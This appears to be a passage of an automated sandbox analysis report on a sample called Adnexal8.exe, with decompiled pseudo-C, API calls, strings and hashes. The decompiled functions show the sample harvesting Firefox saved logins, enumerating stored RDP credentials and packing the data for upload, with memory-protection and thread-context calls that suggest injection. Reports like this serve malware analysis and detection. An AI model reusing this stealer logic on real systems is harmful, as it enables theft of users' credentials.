StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C642

Strings

Settings, xrefs: 0040C65F

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$OpenStorage
String ID: Settings
API String ID: 2489594185-473154195
Opcode ID: 36a72132745558ed86aa4236cfd24305e6f8e4def3dae76d49709cdd574100bc
Instruction ID: 067bfa4a53f500e918e8827405899557c221b1b6cfe0abe27263aec1400916df
Opcode Fuzzy Hash: 36a72132745558ed86aa4236cfd24305e6f8e4def3dae76d49709cdd574100bc
Instruction Fuzzy Hash: E531FC35A4010AFBDF11AFD1CC42FEEBB72AF04714F208266B610791F1D7769A50AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004016F2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004016F2(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t27;
				signed int _t41;
				signed int _t42;
				signed int _t45;

				_t49 = __edx;
				_t45 = 0;
				_t27 =  &_v8;
				_push(_t27);
				_push(_a4);
				L00410DBE();
				if(_t27 >= 0) {
					_v16 = E0040106A(_t27, __edx, _a4);
					_t27 = GlobalLock(_v8);
					if(_t27 != 0) {
						_v20 = _t27;
						_v24 = E004017EC(E004124C2() + 0x500000);
						_v28 = E004017EC(E004124C8(_v16) + 0x100000);
						_v12 = E004124D6(_v20, _v28, _v16, _v24, 0, _v16);
						E004012C7(GlobalUnlock(_v8), _t49, _a4);
						_t41 = E0040149B(_a4, "PKDFILE0YUICRYPTED0YUI1.0", 8);
						_t42 = E00401486(_a4, _v16);
						_t45 = _t41 & _t42 & E004014BC(_a4, _v28, _v12);
						E004017D5(_v24);
						_t27 = E004017D5(_v28);
					}
				}
				E0040125A(_t27, _t49, _a4);
				return _t45;
			}

0x004016f2
0x004016f9
0x004016fb
0x004016fe
0x004016ff
0x00401702
0x00401709
0x00401717
0x00401722
0x00401724
0x0040172a
0x00401743
0x0040175c
0x00401775
0x00401783
0x00401792
0x0040179f
0x004017b4
0x004017b9
0x004017c1
0x004017c1
0x00401724
0x004017c9
0x004017d2

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 00401702
GlobalLock.KERNEL32 ref: 0040171D

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GlobalUnlock.KERNEL32(?,?,?,?,?,-00100000,-00500000), ref: 0040177B

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040178A

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlock
String ID: PKDFILE0YUICRYPTED0YUI1.0
API String ID: 1329788818-258907703
Opcode ID: 03f03f22bb2aa11fbb6c60be5ecb4a60618464061266b6a1867e958b8bd07468
Instruction ID: f2d47b6307a512ba182872b571bc651cab0e361a1f568c2dbe9588986264a33a
Opcode Fuzzy Hash: 03f03f22bb2aa11fbb6c60be5ecb4a60618464061266b6a1867e958b8bd07468
Instruction Fuzzy Hash: 1D212CB6D00108BFDF026FE2CD42AEDBE75EF10344F10413AB914B51B1E77A8AA09B59

Uniqueness

Uniqueness Score: -1.00%

Function 00408390, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408390(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char** _a16) {
				char* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				void* _t47;
				char* _t49;
				char** _t50;
				char* _t70;
				void* _t71;
				char* _t72;
				char* _t73;
				char* _t74;
				char* _t75;
				void* _t76;

				_t76 = __eflags;
				_t71 = __edx;
				E00401388(_t47, _a4, 1, _a16);
				_t49 = E00401304(_t76, _a4, _a16);
				_t74 = _t49;
				while(1) {
					_t75 = _t74;
					if(_t75 == 0) {
						break;
					}
					_t50 = _a16;
					__eflags =  *_t50;
					if( *_t50 == 0) {
						return _t50;
					}
					_v8 = 0;
					_t72 = E004082CF(_t71, _a4, _a12, _a16,  &_v8);
					__eflags = _v8;
					if(_v8 == 0) {
						_v24 = 0;
					} else {
						_t70 = StrStrIA(_v8, "http://");
						__eflags = _t70;
						if(_t70 == 0) {
							_t70 = StrStrIA(_v8, "https://");
						}
						_v24 = _t70;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						E00401486(_a8, 0xbeef0001);
						E004014E8(_a8, _v8);
					}
					while(1) {
						_t73 = _t72;
						__eflags = _t73;
						if(_t73 == 0) {
							break;
						}
						__eflags =  *_a16;
						if( *_a16 != 0) {
							_v12 = 0;
							_v16 = 0;
							_v20 = 0;
							E0040834C(_t71, _a4, _a16,  &_v12,  &_v16,  &_v20);
							__eflags = _v24;
							if(_v24 != 0) {
								__eflags = _v12;
								if(_v12 != 0) {
									__eflags = _v16;
									if(_v16 != 0) {
										L17:
										E004014E8(_a8, _v12);
										E004014E8(_a8, _v16);
										E004014E8(_a8, _v20);
									} else {
										__eflags = _v20;
										if(_v20 != 0) {
											goto L17;
										}
									}
								}
							}
							E004017D5(_v12);
							E004017D5(_v16);
							E004017D5(_v20);
							_t72 = _t73 - 1;
							__eflags = _t72;
							continue;
						} else {
						}
						break;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						E00401486(_a8, 0);
						E00401486(_a8, 0);
						E00401486(_a8, 0);
					}
					_t49 = E004017D5(_v8);
					_t74 = _t75 - 1;
					__eflags = _t74;
				}
				return _t49;
			}

0x00408390
0x00408390
0x004083a0
0x004083ab
0x004083b0
0x004084f2
0x004084f2
0x004084f4
0x00000000
0x00000000
0x004083b7
0x004083ba
0x004083bd
0x00000000
0x00000000
0x004083c4
0x004083dd
0x004083df
0x004083e3
0x00408408
0x004083e5
0x004083f2
0x004083f2
0x004083f4
0x004083fe
0x004083fe
0x00408403
0x00408403
0x0040840f
0x00408413
0x0040841d
0x00408428
0x00408428
0x004084bd
0x004084bd
0x004084bd
0x004084bf
0x00000000
0x00000000
0x00408435
0x00408438
0x0040843f
0x00408446
0x0040844d
0x00408466
0x0040846b
0x0040846f
0x00408471
0x00408475
0x00408477
0x0040847b
0x00408483
0x00408489
0x00408494
0x0040849f
0x0040847d
0x0040847d
0x00408481
0x00000000
0x00000000
0x00408481
0x0040847b
0x00408475
0x004084a7
0x004084af
0x004084b7
0x004084bc
0x004084bc
0x00000000
0x00000000
0x0040843a
0x00000000
0x00408438
0x004084c5
0x004084c9
0x004084d0
0x004084da
0x004084e4
0x004084e4
0x004084ec
0x004084f1
0x004084f1
0x004084f1
0x004084fd

Strings

https://, xrefs: 004083F6
http://, xrefs: 004083E5

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: http://$https://
API String ID: 0-1916535328
Opcode ID: a063d2c108344c13aabfd45f0258bb27b0b3823767d86f34b72639bd5456c7cb
Instruction ID: 13fb2b29f01f002918b78c72c7eb8ae77e77f5b78bf32f99a3c6c152548360db
Opcode Fuzzy Hash: a063d2c108344c13aabfd45f0258bb27b0b3823767d86f34b72639bd5456c7cb
Instruction Fuzzy Hash: CF41053180010AFBDF22AF91CE05BDE7B76AF00314F10817AB950351F1EB794AA0EB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5BD, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 88stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(abe2869f-9b47-4cd9-a358-c22904dba7f7,?,?,00000000), ref: 0040A66D
LocalFree.KERNEL32(00000000), ref: 0040A6CF

Strings

Microsoft_WinInet_*, xrefs: 0040A62A
abe2869f-9b47-4cd9-a358-c22904dba7f7, xrefs: 0040A5D7, 0040A668, 0040A67A

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocallstrlen
String ID: Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
API String ID: 3681330831-3320880043
Opcode ID: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
Instruction ID: 303936e2a8a44d611f5ab066420c5948f3d508f4a04a3d0421c5e20b59dd798b
Opcode Fuzzy Hash: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
Instruction Fuzzy Hash: 38312972900209EBDF219F84DC0ABEEB7B4EB44305F184436E550B62D0D7B95AD4DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C3, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040C0C3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				CHAR* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				char _v28;
				int _t35;

				if(_a16 == 5) {
					_t35 = E0040B1AB(_a12, 2,  &_v8,  &_v12,  &_v16);
					if(_v12 == 1) {
						_push(_v16);
						_pop( *_t8);
						_t35 = lstrcmpiA(_v20, "moz_logins");
						if(_t35 == 0) {
							_t35 = E0040B1AB(_a12, 0,  &_v8,  &_v12,  &_v16);
							if(_v12 == 1) {
								_t35 = lstrcmpA("table", _v16);
								if(_t35 == 0) {
									_t35 = E0040B1AB(_a12, 3,  &_v8,  &_v12,  &_v16);
									if(_v12 == 0) {
										 *_t22 =  *_v16;
										_t35 = E0040B1AB(_a12, 4,  &_v8,  &_v12,  &_v16);
										if(_v12 == 1) {
											 *0x419158 = 0xffffffff;
											 *0x41915c = 0xffffffff;
											 *0x419160 = 0xffffffff;
											_t35 = E0040B69A(_v16, E0040BE43);
											_v28 = 1;
											if( *0x419158 != 0xffffffff &&  *0x41915c != 0xffffffff &&  *0x419160 != 0xffffffff) {
												return E0040B38F(_a4, _a8, _v24,  &_v28, _a20, E0040BEFE);
											}
										}
									}
								}
							}
						}
					}
				}
				return _t35;
			}

0x0040c0cd
0x0040c0e4
0x0040c0ed
0x0040c0f3
0x0040c0f6
0x0040c106
0x0040c108
0x0040c11f
0x0040c128
0x0040c13b
0x0040c13d
0x0040c154
0x0040c15d
0x0040c168
0x0040c17c
0x0040c185
0x0040c187
0x0040c191
0x0040c19b
0x0040c1ad
0x0040c1b2
0x0040c1c0
0x00000000
0x0040c1e9
0x0040c1c0
0x0040c185
0x0040c15d
0x0040c13d
0x0040c128
0x0040c108
0x0040c0ed
0x0040c1ef

APIs

lstrcmpiA.KERNEL32(00000000,moz_logins,?), ref: 0040C101
lstrcmpA.KERNEL32(table,?,00000000,moz_logins,?), ref: 0040C136

Part of subcall function 0040B69A: StrStrIA.SHLWAPI(?,() ), ref: 0040B6AA

Strings

table, xrefs: 0040C131
moz_logins, xrefs: 0040C0F9

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmplstrcmpi
String ID: moz_logins$table
API String ID: 3524194181-1174185386
Opcode ID: d03f47c64e517c75710b6f96bc8a4cf34e83e1d624fd46c84193a1899ce28047
Instruction ID: 9aaa2a27647da64927c3ca6f9125f509d968329839c130476f5429ed0db09bc1
Opcode Fuzzy Hash: d03f47c64e517c75710b6f96bc8a4cf34e83e1d624fd46c84193a1899ce28047
Instruction Fuzzy Hash: 8831D47280020EFADF219F90CC85EDE7B79AB05324F104366E520F51E1DB399B94EB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401A09, Relevance: 6.1, APIs: 4, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401A09(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v280;
				signed int _v284;
				signed int _t27;
				void* _t29;
				signed int _t44;
				signed int _t46;
				void* _t48;
				void* _t49;

				_t49 = __edx;
				_t48 = __ecx;
				_t27 = GetTickCount();
				asm("rol eax, 0xb");
				_v284 =  !_t27;
				_t46 = 0;
				_t29 =  &_v8;
				_push(_t29);
				_push(_a4);
				L00410DBE();
				if(_t29 >= 0) {
					_v16 = E0040106A(_t29, _t49, _a4);
					_t29 = GlobalLock(_v8);
					_t51 = _t29;
					if(_t29 != 0) {
						_v20 = _t29;
						_v12 = E004017EC(_v16);
						E00401823(_v20, _v12, _v16);
						GlobalUnlock(_v8);
						E0040185C(_t48, _t51,  &_v280,  &_v284, 4);
						E004012C7(E004018C7( &_v280, _v12, _v16), _t49, _a4);
						_t44 = E0040149B(_a4,  &_v284, 4);
						_t46 = _t44 & E0040149B(_a4, _v12, _v16);
						_t29 = E004017D5(_v12);
					}
				}
				E0040125A(_t29, _t49, _a4);
				return _t46;
			}

0x00401a09
0x00401a09
0x00401a13
0x00401a18
0x00401a1d
0x00401a23
0x00401a25
0x00401a28
0x00401a29
0x00401a2c
0x00401a33
0x00401a41
0x00401a4c
0x00401a4c
0x00401a4e
0x00401a50
0x00401a5b
0x00401a67
0x00401a6f
0x00401a84
0x00401a9e
0x00401aaf
0x00401ac4
0x00401ac9
0x00401ac9
0x00401a4e
0x00401ad1
0x00401ada

APIs

GetTickCount.KERNEL32 ref: 00401A13
GetHGlobalFromStream.OLE32(?,?,?,?,00410565,?,?,?,?,Oguqcogtkec,?,?,?,?,00000000,?), ref: 00401A2C
GlobalLock.KERNEL32 ref: 00401A47

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GlobalUnlock.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,00410565,?,?,?,?), ref: 00401A6F

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
String ID:
API String ID: 1884134869-0
Opcode ID: 9ec4ad7614db6a7481ded8012edae2c9129aef1efae498da208f41ebf576815f
Instruction ID: 1816704bb606bad1ac1aad56d21282bb97894661860074deb7c63e9bdd074128
Opcode Fuzzy Hash: 9ec4ad7614db6a7481ded8012edae2c9129aef1efae498da208f41ebf576815f
Instruction Fuzzy Hash: 7721797690010CBADF01AFA1DC429EDBFB9EF04344F0041BAB615B50B1EB799B959F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC8E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CC8E(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				int _v12;
				char* _t29;
				char* _t32;

				E00401486(_a4, 0xbeef0000);
				E004014E8(_a4, _a8);
				E004014E8(_a4, _a12);
				E004014BC(_a4, _a16, _a20);
				_t29 = StrStrIA(_a12, 0x415f85);
				if(_t29 == 0) {
					_v12 = lstrlenA("TERMSRV/");
					_t32 = StrStrIA(_a12, "TERMSRV/");
					if(_t32 != 0) {
						_a12 = _t32;
					}
					_t29 = E0040370F(_t32, _a12);
					if(_t29 != 0xffffffff) {
						_v8 = _t29;
						E00401486(_a4, 0xbeef0001);
						E004014E8(_a4, _a8);
						E00401486(_a4, _v8);
						return E004014BC(_a4, _a16, _a20);
					}
				}
				return _t29;
			}

0x0040cc9c
0x0040cca7
0x0040ccb2
0x0040ccc0
0x0040ccd2
0x0040ccd4
0x0040cce0
0x0040ccf0
0x0040ccf2
0x0040ccf7
0x0040ccf7
0x0040ccfd
0x0040cd05
0x0040cd07
0x0040cd12
0x0040cd1d
0x0040cd28
0x00000000
0x0040cd36
0x0040cd05
0x0040cd3c

APIs

Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4

StrStrIA.SHLWAPI(?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCCD
lstrlenA.KERNEL32(TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCDB
StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCEB

Strings

TERMSRV/, xrefs: 0040CCD6, 0040CCE3

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID: TERMSRV/
API String ID: 1659193697-3001602198
Opcode ID: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
Instruction ID: a6930c2e67e34cc212e01140ebbd4d9fa3ed10fe33d805293db90992e34d82a9
Opcode Fuzzy Hash: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
Instruction Fuzzy Hash: 4911FA71450109FFCF126FA1CC829DD3E62AF10354F10863ABD14741F1D77A8AB2AB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC8E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CC8E(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				int _v12;
				char* _t29;
				char* _t32;

				E00401486(_a4, 0xbeef0000);
				E004014E8(_a4, _a8);
				E004014E8(_a4, _a12);
				E004014BC(_a4, _a16, _a20);
				_t29 = StrStrIA(_a12, 0x415f85);
				if(_t29 == 0) {
					_v12 = lstrlenA("TERMSRV/");
					_t32 = StrStrIA(_a12, "TERMSRV/");
					if(_t32 != 0) {
						_a12 = _t32;
					}
					_t29 = E0040370F(_t32, _a12);
					if(_t29 != 0xffffffff) {
						_v8 = _t29;
						E00401486(_a4, 0xbeef0001);
						E004014E8(_a4, _a8);
						E00401486(_a4, _v8);
						return E004014BC(_a4, _a16, _a20);
					}
				}
				return _t29;
			}

APIs

Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4

StrStrIA.SHLWAPI(?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCCD
lstrlenA.KERNEL32(TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCDB
StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCEB

Strings

TERMSRV/, xrefs: 0040CCD6, 0040CCE3

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID: TERMSRV/
API String ID: 1659193697-3001602198
Opcode ID: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
Instruction ID: a6930c2e67e34cc212e01140ebbd4d9fa3ed10fe33d805293db90992e34d82a9
Opcode Fuzzy Hash: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
Instruction Fuzzy Hash: 4911FA71450109FFCF126FA1CC829DD3E62AF10354F10863ABD14741F1D77A8AB2AB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401D69, Relevance: 6.0, APIs: 4, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D69(CHAR* _a4, CHAR* _a8) {
				int _t11;
				CHAR* _t21;

				if(_a4 == 0) {
					_a4 = 0x4140dc;
				}
				if(_a8 == 0) {
					_a8 = 0x4140dc;
				}
				_t11 = lstrlenA(_a4);
				_t21 = E004017EC(_t11 + lstrlenA(_a8) + 1);
				lstrcpyA(_t21, _a4);
				lstrcatA(_t21, _a8);
				if(_a4 != 0x4140dc) {
					E004017D5(_a4);
				}
				return _t21;
			}

0x00401d71
0x00401d73
0x00401d73
0x00401d7e
0x00401d80
0x00401d80
0x00401d8a
0x00401da2
0x00401da8
0x00401db1
0x00401dbd
0x00401dc2
0x00401dc2
0x00401dcb

APIs

lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: 6cc6e09272474b3cb8dce6ba2176f2269a61a8de9243c3ed8c0684545af6c42b
Instruction ID: 9ae4c9ae6809e1f747658f89b899b66aaa74484b7ddbf5727539b292c185063a
Opcode Fuzzy Hash: 6cc6e09272474b3cb8dce6ba2176f2269a61a8de9243c3ed8c0684545af6c42b
Instruction Fuzzy Hash: F3F03075100208BFCF112F62CC81ADE3EA8AF1535CF00C13AB9051A262E7BDC9D48F88

Uniqueness

Uniqueness Score: -1.00%

Function 00401D15, Relevance: 6.0, APIs: 4, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D15(CHAR* _a4, CHAR* _a8) {
				int _t9;
				CHAR* _t18;

				if(_a4 == 0) {
					_a4 = 0x4140dc;
				}
				if(_a8 == 0) {
					_a8 = 0x4140dc;
				}
				_t9 = lstrlenA(_a4);
				_t18 = E004017EC(_t9 + lstrlenA(_a8) + 1);
				lstrcpyA(_t18, _a4);
				lstrcatA(_t18, _a8);
				return _t18;
			}

0x00401d1d
0x00401d1f
0x00401d1f
0x00401d2a
0x00401d2c
0x00401d2c
0x00401d36
0x00401d4e
0x00401d54
0x00401d5d
0x00401d66

APIs

lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: ed04cc0a6ecd02db3481c5f24da25771bf7219ba3f246894e7468dd910f212c0
Instruction ID: b07956f7e4c4c3b071cedfc2c00158bbb0f467af7b0f96d575d83a1108638678
Opcode Fuzzy Hash: ed04cc0a6ecd02db3481c5f24da25771bf7219ba3f246894e7468dd910f212c0
Instruction Fuzzy Hash: 23F03075100208BFDF012FA2DC81ADE3B98AF1435CF00D52AB9151A252E7BDC9D48F98

Uniqueness

Uniqueness Score: -1.00%

Function 00408EC5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00408ED8
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408EF9

Strings

nss3.dll, xrefs: 00408F03

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectorylstrlen
String ID: nss3.dll
API String ID: 2713697268-2492180550
Opcode ID: 3f80516e9565581d8ce7fddc40a23c3c96676ac7c463f2c8aad417b34e152649
Instruction ID: 8c4d155ad2526371845bb933d3f11b8da1162bc186a42e2439c8c001b69ebc86
Opcode Fuzzy Hash: 3f80516e9565581d8ce7fddc40a23c3c96676ac7c463f2c8aad417b34e152649
Instruction Fuzzy Hash: EA115E71510A01EBDB103F34ED4ABC63FA2EB94354F14803AF441A42A1DB7A55E0CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD3F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040CD3F(intOrPtr _a4) {
				void* _v8;
				char _v12;
				void* _t17;
				intOrPtr* _t23;
				void* _t25;

				if( *0x4143f5 != 0 &&  *0x4143f1 != 0 &&  *0x41442d != 0) {
					_v8 = 0;
					_v12 = 0;
					_t17 =  *0x4143f1("TERMSRV/*", 0,  &_v12,  &_v8);
					if(_t17 != 0 && _v12 != 0 && _v8 != 0) {
						_t23 = _v8;
						while(_v12 != 0 &&  *_t23 != 0) {
							E0040CC8E(__eflags, _a4,  *((intOrPtr*)( *_t23 + 0x30)),  *((intOrPtr*)( *_t23 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
							_t25 = _t23;
							_v12 = _v12 - 1;
							_t23 = _t25 + 4;
							__eflags = _t23;
						}
						return  *0x4143f5(_v8);
					}
				}
				return _t17;
			}

0x0040cd4d
0x0040cd61
0x0040cd68
0x0040cd84
0x0040cd86
0x0040cd94
0x0040cdb7
0x0040cdab
0x0040cdb0
0x0040cdb1
0x0040cdb4
0x0040cdb4
0x0040cdb4
0x00000000
0x0040cdc5
0x0040cd86
0x0040cdcd

APIs

CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD7E
CredFree.ADVAPI32(00000000), ref: 0040CDC5

Strings

TERMSRV/*, xrefs: 0040CD79

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Cred$EnumerateFree
String ID: TERMSRV/*
API String ID: 3403564193-275249402
Opcode ID: d0e299ef229a2a28e4c5329bb093eb38bbe2de71871c04fe3f67b1ad540f1a29
Instruction ID: a372621de2bce721beb090cfe78feac401f7af25901f3d57f49ef118639a82fb
Opcode Fuzzy Hash: d0e299ef229a2a28e4c5329bb093eb38bbe2de71871c04fe3f67b1ad540f1a29
Instruction Fuzzy Hash: FF115B72910609FBDF218F84D8C9BDABBB4EF04305F14427BE851721E0C7789A84DB9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Adnexal8.exe PID: 5600 Parent PID: 3184 Adnexal8.exeCOMMON

Executed Functions

Function 04B21491, Relevance: 1.6, APIs: 1, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?,04B20233,00000000,00000000,00000000,00000000,00000000,00000100), ref: 04B214D4

Memory Dump Source

Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 68f1300b4169501a5149b5bf366d46f158dcaf459f2b63602d3b4dfb240e3762
Instruction ID: ec88cb332b9bbe83d3615cc40d4e249eff4afafb5aa53f145f1a2d49264aa390
Opcode Fuzzy Hash: 68f1300b4169501a5149b5bf366d46f158dcaf459f2b63602d3b4dfb240e3762
Instruction Fuzzy Hash: 3C314FB19147529FDB24CF2CD9C4B15B7E0EB45224F04C2E9D5AA8B2D7C234E442C766

Uniqueness

Uniqueness Score: -1.00%

Function 04B20A06, Relevance: 1.6, APIs: 1, Instructions: 68nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(00000000,?), ref: 04B20A15

Memory Dump Source

Source File: 0000000A.00000002.690170836.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 614cbf790dd754109b8ca54cbfdcb230ac824af459207037d42871c7b1f4fd19
Instruction ID: e8465886ab92a751361ea666e128ab925493ed5c64d2dc17d4c32054c7ddd308
Opcode Fuzzy Hash: 614cbf790dd754109b8ca54cbfdcb230ac824af459207037d42871c7b1f4fd19
Instruction Fuzzy Hash: 1F113421504275BFEB14BF7887446AA7B75FF47304F5486D5D52E06022EA20B843DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0041C2B3, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0041C2B3(void* __eax, void* __ebx, void* __esi) {
				void* _t16;
				void* _t18;
				signed char _t20;
				void* _t21;
